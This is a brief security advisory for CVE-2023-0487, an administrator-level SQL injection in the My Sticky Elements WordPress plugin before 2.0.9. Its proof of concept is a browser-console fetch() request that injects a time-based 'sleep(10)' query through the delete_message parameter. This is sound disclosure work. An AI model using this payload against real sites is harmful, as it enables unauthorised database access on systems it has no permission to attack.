My Sticky Elements < 2.0.9 – Admin+ SQLi | CVE 2023-0487

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement when deleting messages, leading to a SQL injection exploitable by high privilege users such as admin

Proof of Concept

1. As an Administrator browse the following page (edit the URL accordingly): https://example.com/wp-admin/admin.php?page=my-sticky-elements-leads

2. Open the browser console and type the following command (edit the URL accordingly): (await fetch('https://example.com/wp-admin/admin.php?page=my-sticky-elements-leads', {method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:`stickyelement-contatc-submit=${document.getElementsByName('stickyelement-contatc-submit')[0].value }&delete_message["PoC"]=(SELECT sleep(10) FROM wp_users)`}))

3. Notice the 10 seconds delay that happens before getting the response, demonstrating that the SQL injection worked.